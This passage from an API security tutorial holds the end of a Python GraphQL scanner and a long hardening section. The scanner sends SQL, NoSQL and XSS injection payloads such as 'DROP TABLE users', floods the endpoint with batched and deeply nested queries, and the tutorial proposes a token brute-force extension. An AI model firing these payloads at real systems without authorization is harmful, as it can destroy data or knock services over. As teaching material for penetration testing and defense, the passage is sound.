if field in data and data[field] is not None and data[field] != "":
exposed_fields.append(field)
elif isinstance(data, list) and data:
for item in data:
if isinstance(item, dict):
for field in sensitive_fields:
if field in item and item[field] is not None and item[field] != "":
exposed_fields.append(field)
break
if exposed_fields:
vulnerability = {
"type": "sensitive_data_exposure",
"operation": query_name,
"severity": "high",
"description": f"The query '{query_name}' exposes sensitive fields: {', '.join(exposed_fields)}",
"proof": query_string,
"exposed_fields": exposed_fields,
"response": result
}
self.log(f"VULNERABILITY: Sensitive data exposure in {query_name}: {', '.join(exposed_fields)}", "CRITICAL")
self.vulnerabilities.append(vulnerability)
def test_injection(self, operation_name, operation_info, is_mutation=False):
"""Test for injection vulnerabilities in operation arguments"""
if not operation_info['args']:
return
# Test each argument for injection vulnerabilities
for arg in operation_info['args']:
arg_name = arg['name']
arg_type = arg['type']
# Only test string arguments
base_type = arg_type
while base_type['kind'] in ['NON_NULL', 'LIST']:
base_type = base_type['ofType']
if base_type['name'] != 'String':
continue
# Test with various injection payloads
payloads = [
"' OR 1=1 --",
"\"; DROP TABLE users; --",
"${process.env.NODE_ENV}",
"'; return true; /*",
"</script><script>alert(1)</script>",
"'; return db.users.find(); /*"
]
for payload in payloads:
# Craft operation with the payload; json.dumps escapes quotes and
# backslashes so the payload is sent as a valid GraphQL string literal
args_str = f"({arg_name}: {json.dumps(payload)})"
operation_string = f"{'mutation' if is_mutation else 'query'} {{ {operation_name}{args_str} }}"
# Run the operation
result = self.run_query(operation_string)
# Check for signs of successful injection
if result:
# Check for error messages indicating injection vulnerability
if 'errors' in result:
for error in result['errors']:
error_msg = error.get('message', '').lower()
# Look for error messages that suggest SQL/NoSQL injection
if any(keyword in error_msg for keyword in ['sql', 'syntax', 'mongo', 'database', 'invalid query', 'unexpected token']):
vulnerability = {
"type": "injection_vulnerability",
"operation": operation_name,
"operation_type": "mutation" if is_mutation else "query",
"argument": arg_name,
"payload": payload,
"severity": "critical",
"description": f"The {'mutation' if is_mutation else 'query'} '{operation_name}' appears vulnerable to injection through the '{arg_name}' argument.",
"proof": operation_string,
"error": error
}
self.log(f"VULNERABILITY: Injection in {operation_name} via {arg_name}", "CRITICAL")
self.vulnerabilities.append(vulnerability)
break
# If we got successful response, check if it's unexpected
elif 'data' in result and operation_name in result['data'] and result['data'][operation_name]:
# If this is a mutation that succeeded with an injection payload, that's suspicious
if is_mutation and any(keyword in payload for keyword in ["'", "\""]):
vulnerability = {
"type": "potential_injection_vulnerability",
"operation": operation_name,
"operation_type": "mutation",
"argument": arg_name,
"payload": payload,
"severity": "high",
"description": f"The mutation '{operation_name}' accepted a payload with quotes in the '{arg_name}' argument, suggesting potential insufficient input validation.",
"proof": operation_string,
"response": result
}
self.log(f"VULNERABILITY: Potential injection in {operation_name} via {arg_name}", "CRITICAL")
self.vulnerabilities.append(vulnerability)
def test_csrf(self, mutation_name, mutation_info):
"""Test if a mutation is vulnerable to CSRF"""
# Create a simple request to test if mutation works without CSRF protection
args = self._build_args_for_mutation(mutation_info)
mutation_string = f"mutation {{ {mutation_name}{args} }}"
# First try with normal request (with all headers)
result1 = self.run_query(mutation_string)
# Now try with minimal headers (simulate CSRF scenario)
minimal_headers = {'Content-Type': 'application/json'}
try:
response = requests.post(
self.endpoint,
headers=minimal_headers,
json={"query": mutation_string},
timeout=30
)
if response.status_code == 200:
result2 = response.json()
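# Check if both requests returned data, suggesting no CSRF protection
# (a null "data" value means the request failed, so it must not count)
if (result1 and result1.get('data') and result1['data'].get(mutation_name) is not None and
result2 and result2.get('data') and result2['data'].get(mutation_name) is not None):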
vulnerability = {
"type": "csrf_vulnerability",
"operation": mutation_name,
"severity": "high",
"description": f"The mutation '{mutation_name}' appears to be vulnerable to CSRF as it works without session-specific headers.",
"proof": mutation_string,
"response": result2
}
self.log(f"VULNERABILITY: CSRF vulnerability in {mutation_name}", "CRITICAL")
self.vulnerabilities.append(vulnerability)
except Exception as e:
self.log(f"Error testing CSRF for {mutation_name}: {str(e)}", "ERROR")
def test_batching(self):
"""Test if the API is vulnerable to batch attacks"""
if not self.queries:
return
self.log("Testing for GraphQL batching/DoS vulnerabilities...")
# Pick a simple query to use for batching
query = None
for q in self.queries:
if not q['args']: # prefer queries without arguments
query = q
break
if not query:
query = self.queries[0]
query_name = query['name']
# Create a simple query
simple_query = f"query {{ {query_name} }}"
# Create batched queries of increasing size
batch_sizes = [5, 20, 50, 100]
for size in batch_sizes:
# Create an array of the same query
batch = [{"query": simple_query} for _ in range(size)]
self.log(f"Testing batch of {size} queries...")
try:
start_time = time.time()
response = self.session.post(
self.endpoint,
headers=self.headers,
json=batch,
timeout=60
)
end_time = time.time()
execution_time = end_time - start_time
if response.status_code == 200:
try:
results = response.json()
# Check if batching worked
if isinstance(results, list) and len(results) == size:
vulnerability = {
"type": "batch_query_vulnerability",
"batch_size": size,
"execution_time": execution_time,
"severity": "medium",
"description": f"The API allows batching {size} queries in a single request, which could be used for DoS attacks or resource exhaustion.",
"proof": f"Batch of {size} '{query_name}' queries",
}
self.log(f"VULNERABILITY: Batch query vulnerability with size {size}, executed in {execution_time:.2f} seconds", "WARNING")
self.vulnerabilities.append(vulnerability)
except Exception as e:
self.log(f"Error parsing batched response: {str(e)}", "ERROR")
except Exception as e:
self.log(f"Error testing batch size {size}: {str(e)}", "ERROR")
def test_query_depth(self):
"""Test if the API is vulnerable to deep nested queries"""
if not self.types:
return
self.log("Testing for nested query/DoS vulnerabilities...")
# Find a type with recursive potential (references itself or can be nested)
recursive_type = None
recursive_field = None
for type_info in self.types:
if type_info['kind'] != 'OBJECT' or not type_info['fields']:
continue
type_name = type_info['name']
for field in type_info['fields']:
field_type = field['type']
# Get to the base type
while field_type['kind'] in ['NON_NULL', 'LIST']:
field_type = field_type['ofType']
# Check if this field references back to the same type
# or any type that has a field referencing this type
if field_type['kind'] == 'OBJECT' and (field_type['name'] == type_name or
any(f['type']['name'] == type_name for t in self.types
for f in (t['fields'] or []) if t['name'] == field_type['name'])):
recursive_type = type_name
recursive_field = field['name']
break
if recursive_type:
break
if not recursive_type or not recursive_field:
self.log("Could not find recursive types for nested query test", "WARNING")
return
# Find a query that returns this type
query_for_type = None
for query in self.queries:
return_type = query['type']
# Get to the base type
while return_type['kind'] in ['NON_NULL', 'LIST']:
return_type = return_type['ofType']
if return_type['kind'] == 'OBJECT' and return_type['name'] == recursive_type:
query_for_type = query
break
if not query_for_type:
self.log(f"Could not find a query returning the recursive type {recursive_type}", "WARNING")
return
# Create nested queries of increasing depth
depths = [5, 10, 20, 50]
for depth in depths:
# Create the nested field selection; the innermost selection must be a
# scalar, so use the __typename meta-field as the leaf
nested_fields = "__typename"
for _ in range(depth):
nested_fields = f"{recursive_field} {{ {nested_fields} }}"
query_string = f"query {{ {query_for_type['name']} {{ {nested_fields} }} }}"
self.log(f"Testing nested query with depth {depth}...")
try:
start_time = time.time()
result = self.run_query(query_string)
end_time = time.time()
execution_time = end_time - start_time
# If the query returned data instead of failing, it may be vulnerable
if result and result.get('data') and result['data'].get(query_for_type['name']) is not None:
vulnerability = {
"type": "nested_query_vulnerability",
"depth": depth,
"execution_time": execution_time,
"severity": "medium",
"description": f"The API allows deeply nested queries (depth {depth}), which could be used for DoS attacks.",
"proof": query_string,
}
self.log(f"VULNERABILITY: Nested query vulnerability with depth {depth}, executed in {execution_time:.2f} seconds", "WARNING")
self.vulnerabilities.append(vulnerability)
except Exception as e:
self.log(f"Error testing depth {depth}: {str(e)}", "ERROR")
def save_vulnerabilities(self):
"""Save found vulnerabilities to file"""
if not self.vulnerabilities:
self.log("No vulnerabilities found to save")
return
output_file = os.path.join(self.output_dir, "vulnerabilities.json")
with open(output_file, 'w') as f:
json.dump({
"endpoint": self.endpoint,
"timestamp": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
"vulnerabilities": self.vulnerabilities
}, f, indent=2)
self.log(f"Saved {len(self.vulnerabilities)} vulnerabilities to {output_file}")
def generate_report(self):
"""Generate a comprehensive security report"""
report_file = os.path.join(self.output_dir, "report.md")
with open(report_file, 'w') as f:
f.write("# GraphQL Security Assessment Report\n\n")
f.write(f"**Endpoint:** {self.endpoint} \n")
f.write(f"**Date:** {time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())} \n\n")
f.write("## Summary\n\n")
if self.schema:
f.write("- Introspection is enabled (schema retrieved) \n")
f.write(f"- Found {len(self.types)} types \n")
f.write(f"- Found {len(self.queries)} queries \n")
f.write(f"- Found {len(self.mutations)} mutations \n")
else:
f.write("- Failed to retrieve schema (introspection might be disabled) \n")
f.write(f"- Found {len(self.vulnerabilities)} security vulnerabilities \n\n")
# Group vulnerabilities by severity
vulnerabilities_by_severity = {
"critical": [],
"high": [],
"medium": [],
"low": []
}
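for vuln in self.vulnerabilities:
severity = vuln.get("severity", "medium")
# Fall back to "medium" for unrecognized severity labels to avoid a KeyError
vulnerabilities_by_severity.get(severity, vulnerabilities_by_severity["medium"]).append(vuln)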
f.write("## Vulnerabilities\n\n")
for severity in ["critical", "high", "medium", "low"]:
vulns = vulnerabilities_by_severity[severity]
if not vulns:
continue
f.write(f"### {severity.capitalize()} Severity ({len(vulns)})\n\n")
for i, vuln in enumerate(vulns, 1):
f.write(f"#### {i}. {vuln['type'].replace('_', ' ').title()}\n\n")
f.write(f"**Operation:** {vuln.get('operation', 'N/A')} \n")
if 'operation_type' in vuln:
f.write(f"**Type:** {vuln['operation_type']} \n")
if 'argument' in vuln:
f.write(f"**Argument:** {vuln['argument']} \n")
f.write(f"**Description:** {vuln['description']} \n")
f.write(f"**Proof:** `{vuln.get('proof', 'N/A')}` \n\n")
f.write("## Recommendations\n\n")
# Add recommendations based on found vulnerabilities
recommendations = set()
for vuln in self.vulnerabilities:
vuln_type = vuln.get('type')
if vuln_type == 'unauthorized_access':
recommendations.add("Implement proper authorization checks for all operations")
elif vuln_type == 'sensitive_data_exposure':
recommendations.add("Apply field-level authorization to prevent exposure of sensitive data")
elif vuln_type == 'injection_vulnerability':
recommendations.add("Implement input validation and sanitization for all arguments")
elif vuln_type == 'csrf_vulnerability':
recommendations.add("Add CSRF protection mechanisms such as tokens or SameSite cookies")
elif vuln_type == 'batch_query_vulnerability':
recommendations.add("Implement limits on batched queries or disable batching")
elif vuln_type == 'nested_query_vulnerability':
recommendations.add("Implement query depth limits to prevent deeply nested queries")
# Add default recommendations
recommendations.add("Disable introspection in production unless absolutely necessary")
recommendations.add("Implement query complexity analysis to prevent DoS attacks")
recommendations.add("Use a GraphQL-specific security library or middleware")
# Sort so the numbered list is stable between runs (set iteration order is arbitrary)
for i, recommendation in enumerate(sorted(recommendations), 1):
f.write(f"{i}. {recommendation} \n")
self.log(f"Generated security report at {report_file}")
return report_file
def run_all_tests(self):
"""Run all security tests"""
# Get schema first
self.get_schema()
# Run tests
self.test_queries()
self.test_mutations()
self.test_batching()
self.test_query_depth()
# Save results
self.save_vulnerabilities()
# Generate report
self.generate_report()
# Print summary
self.print_summary()
def print_summary(self):
"""Print a summary of findings"""
print("\n" + "="*60)
print(f"GRAPHQL SECURITY ASSESSMENT SUMMARY FOR {self.endpoint}")
print("="*60)
if self.schema:
print(f"\nSchema Information:")
print(f" - Types: {len(self.types)}")
print(f" - Queries: {len(self.queries)}")
print(f" - Mutations: {len(self.mutations)}")
else:
print("\nSchema: Failed to retrieve (introspection might be disabled)")
print(f"\nVulnerabilities Found: {len(self.vulnerabilities)}")
# Group by type
vuln_types = {}
for vuln in self.vulnerabilities:
vuln_type = vuln.get('type', 'Unknown')
vuln_types[vuln_type] = vuln_types.get(vuln_type, 0) + 1
# Group by severity
vuln_severities = {}
for vuln in self.vulnerabilities:
severity = vuln.get('severity', 'Unknown')
vuln_severities[severity] = vuln_severities.get(severity, 0) + 1
if vuln_types:
print("\nVulnerabilities by Type:")
for vuln_type, count in vuln_types.items():
print(f" - {vuln_type.replace('_', ' ').title()}: {count}")
if vuln_severities:
print("\nVulnerabilities by Severity:")
for severity in ["critical", "high", "medium", "low"]:
if severity in vuln_severities:
print(f" - {severity.capitalize()}: {vuln_severities[severity]}")
print(f"\nResults saved to: {self.output_dir}")
print("="*60 + "\n")
# Example usage
def main():
parser = argparse.ArgumentParser(description="GraphQL API Security Testing Tool")
parser.add_argument("endpoint", help="GraphQL API endpoint URL")
parser.add_argument("-H", "--header", action="append", help="HTTP headers in format 'Name: Value'")
parser.add_argument("-o", "--output", help="Output directory for results")
parser.add_argument("-t", "--threads", type=int, default=5, help="Number of concurrent threads")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
args = parser.parse_args()
# Parse headers
headers = {}
if args.header:
for header in args.header:
if ":" in header:
name, value = header.split(":", 1)
headers[name.strip()] = value.strip()
else:
print(f"Warning: Invalid header format: {header}")
# Create and run the GraphQL security scanner
scanner = GraphQLSecurity(
endpoint=args.endpoint,
headers=headers,
output_dir=args.output,
threads=args.threads,
verbose=args.verbose
)
scanner.run_all_tests()
if __name__ == "__main__":
main()
Hands-On Challenge #4: Custom Tool Development
Try This: Extend one of the custom frameworks above to add a feature such as:
- Rate limiting detection module
- Authentication token brute force module
- API documentation generator based on discovered endpoints
- Report generation with severity ratings and remediation advice
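As a starting point for the first item, here is a minimal sketch of a rate limiting detection module. It assumes you have already collected `(status_code, headers)` pairs from a burst of requests; the `RateLimitFinding` type, the `detect_rate_limiting` function, and the header list are illustrative names of mine, not part of the frameworks above.

```python
from dataclasses import dataclass
from typing import Mapping, Optional, Sequence, Tuple

# Header names commonly used to advertise limits; the exact set varies by API.
LIMIT_HEADERS = (
    "x-ratelimit-limit",
    "x-ratelimit-remaining",
    "ratelimit-limit",
    "ratelimit-remaining",
    "retry-after",
)


@dataclass
class RateLimitFinding:
    enforced: bool                       # True if any response was HTTP 429
    first_blocked_at: Optional[int]      # 1-based index of the first 429, if any
    advertised_headers: Tuple[str, ...]  # rate limit headers seen in any response


def detect_rate_limiting(
    responses: Sequence[Tuple[int, Mapping[str, str]]]
) -> RateLimitFinding:
    """Analyze (status_code, headers) pairs collected from a request burst."""
    first_blocked = None
    seen = set()
    for index, (status, headers) in enumerate(responses, start=1):
        lowered = {name.lower() for name in headers}
        seen.update(h for h in LIMIT_HEADERS if h in lowered)
        if status == 429 and first_blocked is None:
            first_blocked = index
    return RateLimitFinding(first_blocked is not None, first_blocked, tuple(sorted(seen)))
```

A burst that never returns 429 and advertises no limit headers is a candidate finding for missing rate limiting, though it may only mean the burst was too small to reach the limit.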
Defense Perspective: API Security Hardening
As security professionals, we should not only identify vulnerabilities but also recommend effective defenses. Here are key strategies for hardening API security.
Authentication Best Practices
- Use Strong Authentication Standards:
- Implement OAuth 2.0 with appropriate flows (e.g., Authorization Code with PKCE for SPAs)
- Use OpenID Connect for authentication
- Implement JWT best practices (proper signing, expiration, audience validation)
- Secure Token Implementation:
// TypeScript example of secure JWT implementation
import jwt from 'jsonwebtoken';
import crypto from 'crypto';
class TokenManager {
private readonly secret: Buffer;
private readonly algorithm = 'HS256';
private readonly issuer = 'api.yourdomain.com';
private readonly audience = 'your-client-id';
constructor() {
// Use a strong, environment-specific secret
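const secretKey = process.env.JWT_SECRET;
if (!secretKey) {
throw new Error('JWT_SECRET environment variable must be set');
}
// JWT_SECRET is base64-encoded; HS256 needs at least 32 bytes (256 bits) after decoding
this.secret = Buffer.from(secretKey, 'base64');
if (this.secret.length < 32) {
throw new Error('JWT_SECRET must decode to at least 32 bytes');
}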
}
generateToken(userId: string, role: string): string {
const now = Math.floor(Date.now() / 1000);
return jwt.sign(
{
sub: userId,
role: role,
jti: crypto.randomBytes(16).toString('hex'), // Unique token ID
iat: now,
exp: now + 3600, // 1 hour expiration
iss: this.issuer,
aud: this.audience
},
this.secret,
{ algorithm: this.algorithm }
);
}
validateToken(token: string): any {
try {
return jwt.verify(token, this.secret, {
algorithms: [this.algorithm],
issuer: this.issuer,
audience: this.audience
});
} catch (error) {
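// In strict TypeScript the caught value is `unknown`, so narrow it before reading .message
throw new Error(`Token validation failed: ${(error as Error).message}`);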
}
}
refreshToken(token: string): string {
const payload = this.validateToken(token);
// Prevent refresh if token is about to expire
const now = Math.floor(Date.now() / 1000);
if (payload.exp - now < 300) { // Less than 5 minutes remaining
throw new Error('Token too close to expiration for refresh');
}
// Create new token with same data but new expiration
return this.generateToken(payload.sub, payload.role);
}
}
export default new TokenManager();
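The PKCE extension recommended above for SPAs comes down to two values: a random code verifier kept by the client, and an S256 code challenge derived from it and sent with the authorization request. The following is a minimal sketch of that derivation using only the standard library; the function names are my own, and a real client would also handle the redirect and token exchange.

```python
import base64
import hashlib
import secrets


def make_code_verifier(num_bytes: int = 32) -> str:
    """Return a random URL-safe verifier (43 characters for 32 random bytes)."""
    raw = secrets.token_bytes(num_bytes)
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def make_code_challenge(verifier: str) -> str:
    """Derive the S256 challenge: BASE64URL(SHA256(verifier)) without padding."""
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")
```

The client sends the challenge with `code_challenge_method=S256` and later proves possession by sending the verifier to the token endpoint, so an intercepted authorization code is useless on its own.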
Authorization Implementation
- Role-Based Access Control (RBAC):
// Express middleware for RBAC
function requireRole(role) {
return (req, res, next) => {
const user = req.user; // Assumes previous middleware set this
if (!user) {
return res.status(401).json({ error: 'Authentication required' });
}
if (typeof role === 'string' && user.role !== role) {
return res.status(403).json({ error: 'Insufficient permissions' });
}
if (Array.isArray(role) && !role.includes(user.role)) {
return res.status(403).json({ error: 'Insufficient permissions' });
}
next();
};
}
// Usage in routes
app.get('/api/users', requireRole('admin'), (req, res) => {
// Only admins can access this endpoint
});
app.get('/api/reports', requireRole(['admin', 'manager']), (req, res) => {
// Both admins and managers can access this endpoint
});
- Attribute-Based Access Control (ABAC):
// TypeScript ABAC implementation
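interface Resource {
id: string;
ownerId: string;
type: string;
public: boolean;
status: string;
department: string; // Used by the manager rules below
region: string; // Used by the regional_admin rule below
}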
interface User {
id: string;
role: string;
department: string;
region: string;
}
class AccessControl {
canAccess(user: User, action: string, resource: Resource): boolean {
// Global admin can do anything
if (user.role === 'admin') {
return true;
}
// Owner can always access their own resources
if (resource.ownerId === user.id) {
return true;
}
// Public resources can be read by anyone
if (action === 'read' && resource.public === true) {
return true;
}
// Department-specific rules
if (user.role === 'manager') {
// Managers can read any resource in their department
if (action === 'read' && resource.department === user.department) {
return true;
}
// Managers can update resources in their department if they're in draft
if (action === 'update' &&
resource.department === user.department &&
resource.status === 'draft') {
return true;
}
}
// Region-specific rules
if (user.role === 'regional_admin' && resource.region === user.region) {
return true;
}
// Default deny
return false;
}
}
// Usage
const accessControl = new AccessControl();
const user = getCurrentUser();
const resource = getRequestedResource();
if (accessControl.canAccess(user, 'update', resource)) {
// Allow the operation
} else {
// Deny with 403 Forbidden
}
Rate Limiting Implementation
// Rate limiting with Redis in Express
const redis = require('redis');
const { promisify } = require('util');
const redisClient = redis.createClient(process.env.REDIS_URL);
const incrAsync = promisify(redisClient.incr).bind(redisClient);
const expireAsync = promisify(redisClient.expire).bind(redisClient);
async function rateLimiter(req, res, next) {
try {
// Create a unique key based on IP or user ID
const key = req.user ? `ratelimit:user:${req.user.id}` : `ratelimit:ip:${req.ip}`;
// Increment the counter
const count = await incrAsync(key);
// Set expiration if this is the first request in the window
if (count === 1) {
await expireAsync(key, 60); // 60 second window
}
// Add rate limit headers
res.setHeader('X-RateLimit-Limit', '100');
res.setHeader('X-RateLimit-Remaining', Math.max(0, 100 - count));
// Check if over limit
if (count > 100) {
return res.status(429).json({
error: 'Rate limit exceeded',
retryAfter: 60 // Seconds until reset
});
}
next();
} catch (error) {
// If Redis fails, we'll still allow the request to proceed
console.error('Rate limiting error:', error);
next();
}
}
// Use the middleware
app.use(rateLimiter);
Input Validation
- Schema Validation:
// Using Joi for schema validation
const Joi = require('joi');
// Define schema for user creation
const createUserSchema = Joi.object({
username: Joi.string().alphanum().min(3).max(30).required(),
email: Joi.string().email().required(),
password: Joi.string().pattern(new RegExp('^[a-zA-Z0-9]{8,30}$')).required(),
role: Joi.string().valid('user', 'admin').default('user'),
age: Joi.number().integer().min(18).max(120),
settings: Joi.object({
newsletter: Joi.boolean().default(false),
theme: Joi.string().valid('light', 'dark').default('light')
}).default({})
});
// Middleware for validation
function validateRequest(schema) {
return (req, res, next) => {
const { error, value } = schema.validate(req.body, {
abortEarly: false, // Return all errors, not just the first
stripUnknown: true // Remove unknown properties
});
if (error) {
const errorMessages = error.details.map(detail => detail.message);
return res.status(400).json({
error: 'Validation Error',
details: errorMessages
});
}
// Replace req.body with validated value
req.body = value;
next();
};
}
// Use in route
app.post('/api/users', validateRequest(createUserSchema), (req, res) => {
// Handler code - req.body now contains validated data
});
- GraphQL Input Validation:
// Using graphql-shield for permission/validation rules
const { shield, rule, and, or } = require('graphql-shield');
const { makeExecutableSchema } = require('@graphql-tools/schema');
const { applyMiddleware } = require('graphql-middleware');
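// Authorization rules (assumption: the context function attaches the authenticated user as ctx.user)
const isAuthenticated = rule()(async (parent, args, ctx, info) => Boolean(ctx.user));
const isAdmin = rule()(async (parent, args, ctx, info) => ctx.user?.role === 'admin');
// Define validation rules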
const isValidEmail = rule()(async (parent, args, ctx, info) => {
return /^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}$/i.test(args.email) ||
'Invalid email format';
});
const isStrongPassword = rule()(async (parent, args, ctx, info) => {
// Min 8 chars, at least one uppercase, one lowercase, one number
// Allow any characters (including symbols) as long as the three required classes are present
return /^(?=.*[a-z])(?=.*[A-Z])(?=.*\d).{8,}$/.test(args.password) ||
'Password must be at least 8 characters with uppercase, lowercase, and number';
});
// Define GraphQL permissions/validations
const permissions = shield({
Query: {
user: isAuthenticated,
users: isAdmin,
},
Mutation: {
createUser: and(isAuthenticated, isValidEmail, isStrongPassword),
updateUser: and(isAuthenticated, isValidEmail),
deleteUser: and(isAuthenticated, isAdmin),
},
});
// Create executable schema with permissions middleware
const schema = makeExecutableSchema({ typeDefs, resolvers });
const schemaWithMiddleware = applyMiddleware(schema, permissions);
GraphQL Specific Security
// Apollo Server configuration with security measures
const { ApolloServer } = require('apollo-server-express');
const server = new ApolloServer({
typeDefs,
resolvers,
context: ({ req }) => {
// Authentication context
const token = req.headers.authorization || '';
const user = getUser(token); // Your auth function
return { user };
},
validationRules: [
// Query complexity analysis
require('graphql-validation-complexity').createComplexityLimitRule(1000),
// Query depth limit
require('graphql-depth-limit')(10),
],
plugins: [
// Logging plugin for security monitoring
{
requestDidStart(requestContext) {
return {
didEncounterErrors(errorContext) {
console.error('GraphQL errors:', errorContext.errors);
},
willSendResponse(responseContext) {
const { operationName, query, variables } = responseContext.request;
console.log(`Operation: ${operationName}`, {
query,
variables,
user: responseContext.context.user?.id || 'anonymous',
});
},
};
},
},
],
// Disable introspection in production
introspection: process.env.NODE_ENV !== 'production',
// Disable GraphQL Playground in production (this option exists in Apollo Server 2; it was removed in Apollo Server 3)
playground: process.env.NODE_ENV !== 'production',
});
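To make the depth limit above less of a black box, here is a rough sketch of how nesting depth can be estimated from a raw query string. It is deliberately naive: it counts braces outside string literals, does not expand fragments, and also counts braces in input object literals, so it is not how `graphql-depth-limit` computes depth. The function names are illustrative.

```python
def query_depth(query: str) -> int:
    """Return the maximum brace nesting depth of a GraphQL query string."""
    depth = 0
    max_depth = 0
    in_string = False
    escaped = False
    for ch in query:
        if in_string:
            # Skip everything inside a string literal, honoring backslash escapes
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
            continue
        if ch == '"':
            in_string = True
        elif ch == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == "}":
            depth -= 1
    return max_depth


def exceeds_depth_limit(query: str, limit: int = 10) -> bool:
    """True if the query nests deeper than `limit` levels."""
    return query_depth(query) > limit
```

A check like this is handy during testing for predicting which payloads a depth limit should reject before you send them.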
Secure API Documentation
// Express configuration with secure Swagger docs
const express = require('express');
const swaggerUi = require('swagger-ui-express');
const YAML = require('yamljs');
const swaggerDocument = YAML.load('./swagger.yaml');
const app = express();
// Only expose Swagger docs in non-production
if (process.env.NODE_ENV !== 'production') {
app.use('/api-docs', swaggerUi.serve, swaggerUi.setup(swaggerDocument));
} else {
// In production, secure the docs with authentication
app.use('/api-docs', (req, res, next) => {
// Basic authentication check
const auth = req.headers.authorization;
if (!auth || !auth.startsWith('Basic ')) {
res.set('WWW-Authenticate', 'Basic realm="API Documentation"');
return res.status(401).send('Authentication required');
}
// Decode credentials
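const credentials = Buffer.from(auth.split(' ')[1], 'base64').toString('utf-8');
// Split on the first colon only; passwords may themselves contain ':'
const separatorIndex = credentials.indexOf(':');
if (separatorIndex === -1) {
return res.status(401).send('Invalid credentials');
}
const username = credentials.slice(0, separatorIndex);
const password = credentials.slice(separatorIndex + 1);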
// Check against environment variables
if (username === process.env.DOCS_USERNAME &&
password === process.env.DOCS_PASSWORD) {
return next();
}
res.status(401).send('Invalid credentials');
}, swaggerUi.serve, swaggerUi.setup(swaggerDocument));
}
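Two details of Basic authentication checks are easy to get wrong: passwords may contain colons, and plain string comparison can leak timing information. The sketch below shows both handled with the Python standard library; `parse_basic_auth` and `credentials_match` are hypothetical helper names, and the expected credentials would come from your own configuration.

```python
import base64
import binascii
import hmac
from typing import Optional, Tuple


def parse_basic_auth(header: Optional[str]) -> Optional[Tuple[str, str]]:
    """Return (username, password) from a Basic Authorization header, or None."""
    if not header or not header.startswith("Basic "):
        return None
    try:
        decoded = base64.b64decode(header[len("Basic "):], validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    # Split on the first colon only, since the password may contain ':'
    username, separator, password = decoded.partition(":")
    return (username, password) if separator else None


def credentials_match(header: Optional[str], expected_user: str, expected_password: str) -> bool:
    """Compare supplied credentials to the expected ones in constant time."""
    parsed = parse_basic_auth(header)
    if parsed is None:
        return False
    user_ok = hmac.compare_digest(parsed[0].encode(), expected_user.encode())
    pass_ok = hmac.compare_digest(parsed[1].encode(), expected_password.encode())
    return user_ok and pass_ok
```

Both comparisons run before the result is combined, so a wrong username does not return measurably faster than a wrong password.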
API Gateway Security Configuration
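# AWS API Gateway CloudFormation template example (excerpt)
# The ApiStage and UserPool resources referenced below are assumed to be defined elsewhere in the template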
Resources:
ApiGateway:
Type: AWS::ApiGateway::RestApi
Properties:
Name: SecureAPI
Description: Secure API with proper authentication and rate limiting
EndpointConfiguration:
Types:
- REGIONAL
ApiKey:
Type: AWS::ApiGateway::ApiKey
Properties:
Name: SecureAPIKey
Description: API Key for client authentication
Enabled: true
UsagePlan:
Type: AWS::ApiGateway::UsagePlan
Properties:
UsagePlanName: StandardUsagePlan
Description: Standard usage plan with rate limiting
Quota:
Limit: 10000
Period: MONTH
Throttle:
RateLimit: 10
BurstLimit: 20
ApiStages:
- ApiId: !Ref ApiGateway
Stage: !Ref ApiStage
UsagePlanKey:
Type: AWS::ApiGateway::UsagePlanKey
Properties:
KeyId: !Ref ApiKey
KeyType: API_KEY
UsagePlanId: !Ref UsagePlan
ApiGatewayAuthorizer:
Type: AWS::ApiGateway::Authorizer
Properties:
Name: CognitoAuthorizer
Type: COGNITO_USER_POOLS
IdentitySource: method.request.header.Authorization
RestApiId: !Ref ApiGateway
ProviderARNs:
- !GetAtt UserPool.Arn
ApiMethod:
Type: AWS::ApiGateway::Method
Properties:
HttpMethod: POST
ResourceId: !GetAtt ApiGateway.RootResourceId
RestApiId: !Ref ApiGateway
ApiKeyRequired: true
AuthorizationType: COGNITO_USER_POOLS
AuthorizerId: !Ref ApiGatewayAuthorizer
MethodResponses:
- StatusCode: 200
- StatusCode: 400
- StatusCode: 401
- StatusCode: 403
- StatusCode: 500
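The `RateLimit` and `BurstLimit` values in the usage plan are easier to reason about with a token bucket in mind: the rate is how fast tokens refill, and the burst is the bucket's capacity. The following is a simplified model of that behavior, not AWS's implementation; the `TokenBucket` class and its injected `now` timestamps are my own illustration.

```python
class TokenBucket:
    """Token bucket with a refill rate (tokens per second) and a burst capacity."""

    def __init__(self, rate: float, burst: int, now: float = 0.0):
        self.rate = rate
        self.capacity = burst
        self.tokens = float(burst)  # start full so an initial burst is allowed
        self.updated = now

    def allow(self, now: float) -> bool:
        """Consume one token if available; `now` is a timestamp in seconds."""
        elapsed = max(0.0, now - self.updated)
        # Refill for the elapsed time, never exceeding the burst capacity
        self.tokens = min(self.capacity, self.tokens + elapsed * self.rate)
        self.updated = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False
```

With `rate=10` and `burst=20`, a client can send 20 requests at once, after which it is held to roughly 10 requests per second until the bucket refills. When testing, this means a short burst may pass even though sustained traffic would be throttled.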
API Security Checklist
Use this comprehensive checklist to secure your APIs:
- Authentication
- [ ] Use standard authentication (OAuth2, JWT, API keys)
- [ ] Implement proper token validation
- [ ] Set short expiration times for tokens
- [ ] Rotate credentials and keys regularly
- [ ] Secure credential storage (use KMS, Vault, etc.)
- [ ] Implement MFA for sensitive operations
- Authorization
- [ ] Implement principle of least privilege
- [ ] Use Role-Based Access Control (RBAC)
- [ ] Consider Attribute-Based Access Control (ABAC) for complex permissions
- [ ] Validate resource ownership on all endpoints
- [ ] Apply authorization at both API gateway and service levels
- Input Validation
- [ ] Validate all input parameters (type, format, range)
- [ ] Implement schema validation for request bodies
- [ ] Sanitize inputs to prevent injection attacks
- [ ] Use a whitelist approach for input validation
- Output Control
- [ ] Implement response filtering based on user permissions
- [ ] Remove sensitive data from responses
- [ ] Use consistent error messages that don't leak information
- [ ] Consider implementing field-level security
- Rate Limiting and Quotas
- [ ] Implement rate limiting per user/API key
- [ ] Set quotas for resource-intensive operations
- [ ] Use exponential backoff for repeated failures
